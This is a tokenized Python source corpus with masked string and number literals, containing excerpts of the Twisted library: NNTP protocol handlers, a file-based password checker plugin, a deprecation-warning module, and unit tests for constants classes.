<NUM_LIT:1> <EOL> def do_XPATH ( self , article ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_XINDEX ( self , article ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def do_XROVER ( self , range = None ) : <EOL> """<STR_LIT>""" <EOL> self . do_XHDR ( '<STR_LIT>' , range ) <EOL> def do_IHAVE ( self , id ) : <EOL> self . factory . backend . articleExistsRequest ( id ) . addCallback ( self . _foundArticle ) <EOL> def _foundArticle ( self , result ) : <EOL> if result : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . inputHandler = self . _handleIHAVE <EOL> self . message = '<STR_LIT>' <EOL> def _handleIHAVE ( self , line ) : <EOL> if line == '<STR_LIT:.>' : <EOL> self . inputHandler = None <EOL> self . factory . backend . postRequest ( <EOL> self . message <EOL> ) . addCallbacks ( self . _gotIHAVE , self . _errIHAVE ) <EOL> self . message = '<STR_LIT>' <EOL> else : <EOL> self . message = self . message + line + '<STR_LIT:\r\n>' <EOL> def _gotIHAVE ( self , result ) : <EOL> self . 
sendLine ( '<STR_LIT>' ) <EOL> def _errIHAVE ( self , failure ) : <EOL> print '<STR_LIT>' , failure <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> class UsenetClientProtocol ( NNTPClient ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , groups , date , storage ) : <EOL> """<STR_LIT>""" <EOL> NNTPClient . __init__ ( self ) <EOL> self . groups , self . date , self . storage = groups , date , storage <EOL> def connectionMade ( self ) : <EOL> NNTPClient . connectionMade ( self ) <EOL> log . msg ( "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> self . setStream ( ) <EOL> self . fetchNewNews ( self . groups , self . date , '<STR_LIT>' ) <EOL> def articleExists ( self , exists , article ) : <EOL> if exists : <EOL> self . fetchArticle ( article ) <EOL> else : <EOL> self . count = self . count - <NUM_LIT:1> <EOL> self . disregard = self . disregard + <NUM_LIT:1> <EOL> def gotNewNews ( self , news ) : <EOL> self . disregard = <NUM_LIT:0> <EOL> self . count = len ( news ) <EOL> log . msg ( "<STR_LIT>" + str ( self . count ) + "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> for i in news : <EOL> self . storage . articleExistsRequest ( i ) . addCallback ( self . articleExists , i ) <EOL> def getNewNewsFailed ( self , reason ) : <EOL> log . msg ( "<STR_LIT>" + reason + "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> self . quit ( ) <EOL> def gotArticle ( self , article ) : <EOL> self . storage . postRequest ( article ) <EOL> self . count = self . count - <NUM_LIT:1> <EOL> if not self . count : <EOL> log . msg ( "<STR_LIT>" + str ( self . transport . getPeer ( ) ) ) <EOL> if self . disregard : <EOL> log . msg ( "<STR_LIT>" % ( self . disregard , ) ) <EOL> self . factory . updateChecks ( self . transport . getPeer ( ) ) <EOL> self . quit ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from zope . interface import implements <EOL> from twisted import plugin <EOL> from twisted . cred . checkers import FilePasswordDB <EOL> from twisted . cred . strcred import ICheckerFactory <EOL> from twisted . cred . credentials import IUsernamePassword , IUsernameHashedPassword <EOL> fileCheckerFactoryHelp = """<STR_LIT>""" <EOL> invalidFileWarning = '<STR_LIT>' <EOL> class FileCheckerFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( ICheckerFactory , plugin . IPlugin ) <EOL> authType = '<STR_LIT:file>' <EOL> authHelp = fileCheckerFactoryHelp <EOL> argStringFormat = '<STR_LIT>' <EOL> credentialInterfaces = ( IUsernamePassword , IUsernameHashedPassword ) <EOL> errorOutput = sys . stderr <EOL> def generateChecker ( self , argstring ) : <EOL> """<STR_LIT>""" <EOL> from twisted . python . filepath import FilePath <EOL> if not argstring . strip ( ) : <EOL> raise ValueError , '<STR_LIT>' % self . authType <EOL> elif not FilePath ( argstring ) . isfile ( ) : <EOL> self . errorOutput . write ( '<STR_LIT>' % ( invalidFileWarning , argstring ) ) <EOL> return FilePasswordDB ( argstring ) <EOL> theFileCheckerFactory = FileCheckerFactory ( ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import sys , inspect <EOL> from warnings import warn , warn_explicit <EOL> from dis import findlinestarts <EOL> from twisted . python . versions import getVersionString <EOL> from twisted . python . util import mergeFunctionMetadata <EOL> DEPRECATION_WARNING_FORMAT = '<STR_LIT>' <EOL> def _fullyQualifiedName ( obj ) : <EOL> """<STR_LIT>""" <EOL> name = obj . __name__ <EOL> if inspect . isclass ( obj ) or inspect . isfunction ( obj ) : <EOL> moduleName = obj . __module__ <EOL> return "<STR_LIT>" % ( moduleName , name ) <EOL> elif inspect . ismethod ( obj ) : <EOL> className = _fullyQualifiedName ( obj . im_class ) <EOL> return "<STR_LIT>" % ( className , name ) <EOL> return name <EOL> _fullyQualifiedName . __module__ = '<STR_LIT>' <EOL> _fullyQualifiedName . __name__ = '<STR_LIT>' <EOL> def getWarningMethod ( ) : <EOL> """<STR_LIT>""" <EOL> return warn <EOL> def setWarningMethod ( newMethod ) : <EOL> """<STR_LIT>""" <EOL> global warn <EOL> warn = newMethod <EOL> def _getDeprecationDocstring ( version , replacement = None ) : <EOL> """<STR_LIT>""" <EOL> doc = "<STR_LIT>" % ( getVersionString ( version ) , ) <EOL> if replacement : <EOL> doc = "<STR_LIT>" % ( doc , _getReplacementString ( replacement ) ) <EOL> return doc + "<STR_LIT:.>" <EOL> def _getReplacementString ( replacement ) : <EOL> """<STR_LIT>""" <EOL> if callable ( replacement ) : <EOL> replacement = _fullyQualifiedName ( replacement ) <EOL> return "<STR_LIT>" % ( replacement , ) <EOL> def _getDeprecationWarningString ( fqpn , version , format = None , replacement = None ) : <EOL> """<STR_LIT>""" <EOL> if format is None : <EOL> format = DEPRECATION_WARNING_FORMAT <EOL> warningString = format % { <EOL> '<STR_LIT>' : fqpn , <EOL> '<STR_LIT:version>' : getVersionString ( version ) } <EOL> if replacement : <EOL> warningString = "<STR_LIT>" % ( <EOL> 
warningString , _getReplacementString ( replacement ) ) <EOL> return warningString <EOL> def getDeprecationWarningString ( callableThing , version , format = None , <EOL> replacement = None ) : <EOL> """<STR_LIT>""" <EOL> return _getDeprecationWarningString ( <EOL> _fullyQualifiedName ( callableThing ) , version , format , replacement ) <EOL> def deprecated ( version , replacement = None ) : <EOL> """<STR_LIT>""" <EOL> def deprecationDecorator ( function ) : <EOL> """<STR_LIT>""" <EOL> warningString = getDeprecationWarningString ( <EOL> function , version , None , replacement ) <EOL> def deprecatedFunction ( * args , ** kwargs ) : <EOL> warn ( <EOL> warningString , <EOL> DeprecationWarning , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> return function ( * args , ** kwargs ) <EOL> deprecatedFunction = mergeFunctionMetadata ( <EOL> function , deprecatedFunction ) <EOL> _appendToDocstring ( deprecatedFunction , <EOL> _getDeprecationDocstring ( version , replacement ) ) <EOL> deprecatedFunction . deprecatedVersion = version <EOL> return deprecatedFunction <EOL> return deprecationDecorator <EOL> def _appendToDocstring ( thingWithDoc , textToAppend ) : <EOL> """<STR_LIT>""" <EOL> if thingWithDoc . __doc__ : <EOL> docstringLines = thingWithDoc . __doc__ . splitlines ( ) <EOL> else : <EOL> docstringLines = [ ] <EOL> if len ( docstringLines ) == <NUM_LIT:0> : <EOL> docstringLines . append ( textToAppend ) <EOL> elif len ( docstringLines ) == <NUM_LIT:1> : <EOL> docstringLines . extend ( [ '<STR_LIT>' , textToAppend , '<STR_LIT>' ] ) <EOL> else : <EOL> spaces = docstringLines . pop ( ) <EOL> docstringLines . extend ( [ '<STR_LIT>' , <EOL> spaces + textToAppend , <EOL> spaces ] ) <EOL> thingWithDoc . __doc__ = '<STR_LIT:\n>' . join ( docstringLines ) <EOL> class _InternalState ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proxy ) : <EOL> object . __setattr__ ( self , '<STR_LIT>' , proxy ) <EOL> def __getattribute__ ( self , name ) : <EOL> return object . 
__getattribute__ ( object . __getattribute__ ( self , '<STR_LIT>' ) , <EOL> name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> return object . __setattr__ ( object . __getattribute__ ( self , '<STR_LIT>' ) , <EOL> name , value ) <EOL> class _ModuleProxy ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , module ) : <EOL> state = _InternalState ( self ) <EOL> state . _module = module <EOL> state . _deprecatedAttributes = { } <EOL> state . _lastWasPath = False <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = _InternalState ( self ) <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , state . _module ) <EOL> def __setattr__ ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> state = _InternalState ( self ) <EOL> state . _lastWasPath = False <EOL> setattr ( state . _module , name , value ) <EOL> def __getattribute__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> state = _InternalState ( self ) <EOL> if state . _lastWasPath : <EOL> deprecatedAttribute = None <EOL> else : <EOL> deprecatedAttribute = state . _deprecatedAttributes . get ( name ) <EOL> if deprecatedAttribute is not None : <EOL> value = deprecatedAttribute . get ( ) <EOL> else : <EOL> value = getattr ( state . _module , name ) <EOL> if name == '<STR_LIT>' : <EOL> state . _lastWasPath = True <EOL> else : <EOL> state . _lastWasPath = False <EOL> return value <EOL> class _DeprecatedAttribute ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , module , name , version , message ) : <EOL> """<STR_LIT>""" <EOL> self . module = module <EOL> self . __name__ = name <EOL> self . fqpn = module . __name__ + '<STR_LIT:.>' + name <EOL> self . version = version <EOL> self . message = message <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> result = getattr ( self . module , self . __name__ ) <EOL> message = _getDeprecationWarningString ( self . fqpn , self . version , <EOL> DEPRECATION_WARNING_FORMAT + '<STR_LIT>' + self . 
message ) <EOL> warn ( message , DeprecationWarning , stacklevel = <NUM_LIT:3> ) <EOL> return result <EOL> def _deprecateAttribute ( proxy , name , version , message ) : <EOL> """<STR_LIT>""" <EOL> _module = object . __getattribute__ ( proxy , '<STR_LIT>' ) <EOL> attr = _DeprecatedAttribute ( _module , name , version , message ) <EOL> _deprecatedAttributes = object . __getattribute__ ( <EOL> proxy , '<STR_LIT>' ) <EOL> _deprecatedAttributes [ name ] = attr <EOL> def deprecatedModuleAttribute ( version , message , moduleName , name ) : <EOL> """<STR_LIT>""" <EOL> module = sys . modules [ moduleName ] <EOL> if not isinstance ( module , _ModuleProxy ) : <EOL> module = _ModuleProxy ( module ) <EOL> sys . modules [ moduleName ] = module <EOL> _deprecateAttribute ( module , name , version , message ) <EOL> def warnAboutFunction ( offender , warningString ) : <EOL> """<STR_LIT>""" <EOL> offenderModule = sys . modules [ offender . __module__ ] <EOL> filename = inspect . getabsfile ( offenderModule ) <EOL> lineStarts = list ( findlinestarts ( offender . func_code ) ) <EOL> lastLineNo = lineStarts [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> globals = offender . func_globals <EOL> kwargs = dict ( <EOL> category = DeprecationWarning , <EOL> filename = filename , <EOL> lineno = lastLineNo , <EOL> module = offenderModule . __name__ , <EOL> registry = globals . setdefault ( "<STR_LIT>" , { } ) , <EOL> module_globals = None ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] < ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> kwargs . pop ( '<STR_LIT>' ) <EOL> warn_explicit ( warningString , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial . unittest import TestCase <EOL> from twisted . python . constants import ( <EOL> NamedConstant , Names , ValueConstant , Values , FlagConstant , Flags ) <EOL> class NamedConstantTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class foo ( Names ) : <EOL> pass <EOL> self . container = foo <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> name = NamedConstant ( ) <EOL> name . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertEqual ( "<STR_LIT:bar>" , name . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> name = NamedConstant ( ) <EOL> name . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertEqual ( "<STR_LIT>" , repr ( name ) ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> name = NamedConstant ( ) <EOL> name . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertTrue ( name == name ) <EOL> self . assertFalse ( name != name ) <EOL> def test_nonequality ( self ) : <EOL> """<STR_LIT>""" <EOL> first = NamedConstant ( ) <EOL> first . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> second = NamedConstant ( ) <EOL> second . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertFalse ( first == second ) <EOL> self . assertTrue ( first != second ) <EOL> def test_hash ( self ) : <EOL> """<STR_LIT>""" <EOL> first = NamedConstant ( ) <EOL> first . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> second = NamedConstant ( ) <EOL> second . _realize ( self . container , "<STR_LIT:bar>" , None ) <EOL> self . assertNotEqual ( hash ( first ) , hash ( second ) ) <EOL> class _ConstantsTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def _notInstantiableTest ( self , name , cls ) : <EOL> """<STR_LIT>""" <EOL> exc = self . assertRaises ( TypeError , cls ) <EOL> self . 
assertEqual ( name + "<STR_LIT>" , str ( exc ) ) <EOL> class NamesTests ( TestCase , _ConstantsTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class METHOD ( Names ) : <EOL> """<STR_LIT>""" <EOL> GET = NamedConstant ( ) <EOL> PUT = NamedConstant ( ) <EOL> POST = NamedConstant ( ) <EOL> DELETE = NamedConstant ( ) <EOL> self . METHOD = METHOD <EOL> def test_notInstantiable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _notInstantiableTest ( "<STR_LIT>" , self . METHOD ) <EOL> def test_symbolicAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT:GET>" ) ) <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT:POST>" ) ) <EOL> self . assertTrue ( hasattr ( self . METHOD , "<STR_LIT>" ) ) <EOL> def test_withoutOtherAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( hasattr ( self . METHOD , "<STR_LIT:foo>" ) ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , repr ( self . METHOD . GET ) ) <EOL> def test_lookupByName ( self ) : <EOL> """<STR_LIT>""" <EOL> method = self . METHOD . lookupByName ( "<STR_LIT:GET>" ) <EOL> self . assertIdentical ( self . METHOD . GET , method ) <EOL> def test_notLookupMissingByName ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . METHOD . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . METHOD . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . METHOD . lookupByName , "<STR_LIT:foo>" ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT:GET>" , self . METHOD . GET . name ) <EOL> def test_attributeIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . METHOD . GET , self . METHOD . 
GET ) <EOL> def test_iterconstants ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . METHOD . iterconstants ( ) ) <EOL> self . assertEqual ( <EOL> [ self . METHOD . GET , self . METHOD . PUT , <EOL> self . METHOD . POST , self . METHOD . DELETE ] , <EOL> constants ) <EOL> def test_attributeIterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . METHOD . iterconstants ( ) ) <EOL> self . assertIdentical ( self . METHOD . GET , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( self . METHOD . PUT , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( self . METHOD . POST , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( self . METHOD . DELETE , constants [ <NUM_LIT:3> ] ) <EOL> def test_iterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . METHOD . iterconstants ( ) ) <EOL> again = list ( self . METHOD . iterconstants ( ) ) <EOL> self . assertIdentical ( again [ <NUM_LIT:0> ] , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:1> ] , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:2> ] , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:3> ] , constants [ <NUM_LIT:3> ] ) <EOL> def test_initializedOnce ( self ) : <EOL> """<STR_LIT>""" <EOL> first = self . METHOD . _enumerants <EOL> self . METHOD . GET <EOL> second = self . METHOD . _enumerants <EOL> self . assertIdentical ( first , second ) <EOL> class ValuesTests ( TestCase , _ConstantsTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class STATUS ( Values ) : <EOL> OK = ValueConstant ( "<STR_LIT>" ) <EOL> NOT_FOUND = ValueConstant ( "<STR_LIT>" ) <EOL> self . STATUS = STATUS <EOL> def test_notInstantiable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _notInstantiableTest ( "<STR_LIT>" , self . STATUS ) <EOL> def test_symbolicAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
assertTrue ( hasattr ( self . STATUS , "<STR_LIT:OK>" ) ) <EOL> self . assertTrue ( hasattr ( self . STATUS , "<STR_LIT>" ) ) <EOL> def test_withoutOtherAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( hasattr ( self . STATUS , "<STR_LIT:foo>" ) ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , repr ( self . STATUS . OK ) ) <EOL> def test_lookupByName ( self ) : <EOL> """<STR_LIT>""" <EOL> method = self . STATUS . lookupByName ( "<STR_LIT:OK>" ) <EOL> self . assertIdentical ( self . STATUS . OK , method ) <EOL> def test_notLookupMissingByName ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByName , "<STR_LIT:foo>" ) <EOL> def test_lookupByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> status = self . STATUS . lookupByValue ( "<STR_LIT>" ) <EOL> self . assertIdentical ( self . STATUS . OK , status ) <EOL> def test_lookupDuplicateByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> class TRANSPORT_MESSAGE ( Values ) : <EOL> """<STR_LIT>""" <EOL> KEX_DH_GEX_REQUEST_OLD = ValueConstant ( <NUM_LIT:30> ) <EOL> KEXDH_INIT = ValueConstant ( <NUM_LIT:30> ) <EOL> self . assertIdentical ( <EOL> TRANSPORT_MESSAGE . lookupByValue ( <NUM_LIT:30> ) , <EOL> TRANSPORT_MESSAGE . KEX_DH_GEX_REQUEST_OLD ) <EOL> def test_notLookupMissingByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByValue , "<STR_LIT:OK>" ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByValue , <NUM_LIT:200> ) <EOL> self . assertRaises ( ValueError , self . STATUS . lookupByValue , "<STR_LIT>" ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT:OK>" , self . STATUS . OK . 
name ) <EOL> def test_attributeIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . STATUS . OK , self . STATUS . OK ) <EOL> def test_iterconstants ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . STATUS . iterconstants ( ) ) <EOL> self . assertEqual ( <EOL> [ self . STATUS . OK , self . STATUS . NOT_FOUND ] , <EOL> constants ) <EOL> def test_attributeIterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . STATUS . iterconstants ( ) ) <EOL> self . assertIdentical ( self . STATUS . OK , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( self . STATUS . NOT_FOUND , constants [ <NUM_LIT:1> ] ) <EOL> def test_iterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . STATUS . iterconstants ( ) ) <EOL> again = list ( self . STATUS . iterconstants ( ) ) <EOL> self . assertIdentical ( again [ <NUM_LIT:0> ] , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:1> ] , constants [ <NUM_LIT:1> ] ) <EOL> def test_initializedOnce ( self ) : <EOL> """<STR_LIT>""" <EOL> first = self . STATUS . _enumerants <EOL> self . STATUS . OK <EOL> second = self . STATUS . _enumerants <EOL> self . assertIdentical ( first , second ) <EOL> class _FlagsTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> class FXF ( Flags ) : <EOL> READ = FlagConstant ( ) <EOL> WRITE = FlagConstant ( ) <EOL> APPEND = FlagConstant ( ) <EOL> EXCLUSIVE = FlagConstant ( <NUM_LIT> ) <EOL> TEXT = FlagConstant ( ) <EOL> self . FXF = FXF <EOL> class FlagsTests ( _FlagsTestsMixin , TestCase , _ConstantsTestsMixin ) : <EOL> """<STR_LIT>""" <EOL> def test_notInstantiable ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _notInstantiableTest ( "<STR_LIT>" , self . FXF ) <EOL> def test_symbolicAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . 
FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> self . assertTrue ( hasattr ( self . FXF , "<STR_LIT>" ) ) <EOL> def test_withoutOtherAttributes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( hasattr ( self . FXF , "<STR_LIT:foo>" ) ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , repr ( self . FXF . READ ) ) <EOL> def test_lookupByName ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . lookupByName ( "<STR_LIT>" ) <EOL> self . assertIdentical ( self . FXF . READ , flag ) <EOL> def test_notLookupMissingByName ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , self . FXF . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . FXF . lookupByName , "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . FXF . lookupByName , "<STR_LIT:foo>" ) <EOL> def test_lookupByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . READ ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . WRITE ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . APPEND ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . EXCLUSIVE ) <EOL> flag = self . FXF . lookupByValue ( <NUM_LIT> ) <EOL> self . assertIdentical ( flag , self . FXF . TEXT ) <EOL> def test_lookupDuplicateByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> class TIMEX ( Flags ) : <EOL> ADJ_OFFSET = FlagConstant ( <NUM_LIT> ) <EOL> MOD_OFFSET = FlagConstant ( <NUM_LIT> ) <EOL> self . assertIdentical ( TIMEX . lookupByValue ( <NUM_LIT> ) , TIMEX . ADJ_OFFSET ) <EOL> def test_notLookupMissingByValue ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
assertRaises ( ValueError , self . FXF . lookupByValue , <NUM_LIT> ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( "<STR_LIT>" , self . FXF . READ . name ) <EOL> def test_attributeIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . FXF . READ , self . FXF . READ ) <EOL> def test_iterconstants ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . FXF . iterconstants ( ) ) <EOL> self . assertEqual ( <EOL> [ self . FXF . READ , self . FXF . WRITE , self . FXF . APPEND , <EOL> self . FXF . EXCLUSIVE , self . FXF . TEXT ] , <EOL> constants ) <EOL> def test_attributeIterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . FXF . iterconstants ( ) ) <EOL> self . assertIdentical ( self . FXF . READ , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( self . FXF . WRITE , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( self . FXF . APPEND , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( self . FXF . EXCLUSIVE , constants [ <NUM_LIT:3> ] ) <EOL> self . assertIdentical ( self . FXF . TEXT , constants [ <NUM_LIT:4> ] ) <EOL> def test_iterconstantsIdentity ( self ) : <EOL> """<STR_LIT>""" <EOL> constants = list ( self . FXF . iterconstants ( ) ) <EOL> again = list ( self . FXF . iterconstants ( ) ) <EOL> self . assertIdentical ( again [ <NUM_LIT:0> ] , constants [ <NUM_LIT:0> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:1> ] , constants [ <NUM_LIT:1> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:2> ] , constants [ <NUM_LIT:2> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:3> ] , constants [ <NUM_LIT:3> ] ) <EOL> self . assertIdentical ( again [ <NUM_LIT:4> ] , constants [ <NUM_LIT:4> ] ) <EOL> def test_initializedOnce ( self ) : <EOL> """<STR_LIT>""" <EOL> first = self . FXF . _enumerants <EOL> self . FXF . READ <EOL> second = self . FXF . _enumerants <EOL> self . 
assertIdentical ( first , second ) <EOL> class FlagConstantSimpleOrTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . READ | self . FXF . WRITE <EOL> self . assertEqual ( self . FXF . READ . value | self . FXF . WRITE . value , flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . READ | self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> flag = self . FXF . READ | self . FXF . WRITE <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) <EOL> class FlagConstantSimpleAndTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite & writeAppend <EOL> self . assertEqual ( self . FXF . WRITE . value , flag . value ) <EOL> def test_name ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite & writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , flag . name ) <EOL> def test_representation ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite & writeAppend <EOL> self . assertEqual ( "<STR_LIT>" , repr ( flag ) ) <EOL> class FlagConstantSimpleExclusiveOrTests ( _FlagsTestsMixin , TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_value ( self ) : <EOL> """<STR_LIT>""" <EOL> readWrite = ( self . FXF . READ | self . FXF . WRITE ) <EOL> writeAppend = ( self . FXF . WRITE | self . FXF . APPEND ) <EOL> flag = readWrite ^ writeAppend <EOL> self . assertEqual ( self . FXF . READ . value | self . FXF . APPEND . 
